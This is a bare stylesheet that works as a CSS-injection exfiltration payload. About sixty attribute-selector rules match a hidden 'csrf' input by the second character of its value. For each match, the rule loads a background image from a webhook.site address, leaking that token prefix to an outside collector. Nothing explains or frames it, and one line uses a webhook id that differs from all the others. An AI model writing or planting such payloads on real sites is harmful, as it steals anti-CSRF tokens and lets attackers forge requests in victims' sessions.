/*  */
input[name="csrf"][value^="ra"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ra'); }
input[name="csrf"][value^="rb"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rb'); }
input[name="csrf"][value^="rc"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rc'); }
input[name="csrf"][value^="rd"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rd'); }
input[name="csrf"][value^="re"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=re'); }
input[name="csrf"][value^="rf"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rf'); }
input[name="csrf"][value^="rg"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rg'); }
input[name="csrf"][value^="rh"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rh'); }
input[name="csrf"][value^="ri"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ri'); }
input[name="csrf"][value^="rj"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rj'); }
input[name="csrf"][value^="rk"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rk'); }
input[name="csrf"][value^="rl"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rl'); }
input[name="csrf"][value^="rm"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rm'); }
input[name="csrf"][value^="rn"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rn'); }
input[name="csrf"][value^="ro"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ro'); }
input[name="csrf"][value^="rp"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rp'); }
input[name="csrf"][value^="rq"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rq'); }
input[name="csrf"][value^="rr"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rr'); }
input[name="csrf"][value^="rs"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rs'); }
input[name="csrf"][value^="rt"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rt'); }
input[name="csrf"][value^="ru"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru'); }
input[name="csrf"][value^="rv"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rv'); }
input[name="csrf"][value^="rw"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rw'); }
input[name="csrf"][value^="rx"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rx'); }
input[name="csrf"][value^="ry"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ry'); }
input[name="csrf"][value^="rz"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rz'); }
input[name="csrf"][value^="rA"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rA'); }
input[name="csrf"][value^="rB"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rB'); }
input[name="csrf"][value^="rC"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rC'); }
input[name="csrf"][value^="rD"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rD'); }
input[name="csrf"][value^="rE"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rE'); }
input[name="csrf"][value^="rF"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rF'); }
input[name="csrf"][value^="rG"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rG'); }
input[name="csrf"][value^="rH"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rH'); }
input[name="csrf"][value^="rI"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rI'); }
input[name="csrf"][value^="rJ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rJ'); }
input[name="csrf"][value^="rK"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rK'); }
input[name="csrf"][value^="rL"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rL'); }
input[name="csrf"][value^="rM"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rM'); }
input[name="csrf"][value^="rN"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rN'); }
input[name="csrf"][value^="rO"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rO'); }
input[name="csrf"][value^="rP"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rP'); }
input[name="csrf"][value^="rQ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rQ'); }
input[name="csrf"][value^="rR"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-889956362f73?c=rR'); }
input[name="csrf"][value^="rS"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rS'); }
input[name="csrf"][value^="rT"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rT'); }
input[name="csrf"][value^="rU"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rU'); }
input[name="csrf"][value^="rV"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rV'); }
input[name="csrf"][value^="rW"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rW'); }
input[name="csrf"][value^="rX"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rX'); }
input[name="csrf"][value^="rY"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rY'); }
input[name="csrf"][value^="rZ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rZ'); }
input[name="csrf"][value^="r0"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r0'); }
input[name="csrf"][value^="r1"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r1'); }
input[name="csrf"][value^="r2"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r2'); }
input[name="csrf"][value^="r3"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r3'); }
input[name="csrf"][value^="r4"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r4'); }
input[name="csrf"][value^="r5"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r5'); }
input[name="csrf"][value^="r6"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r6'); }
input[name="csrf"][value^="r7"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r7'); }
input[name="csrf"][value^="r8"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r8'); }
input[name="csrf"][value^="r9"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r9'); }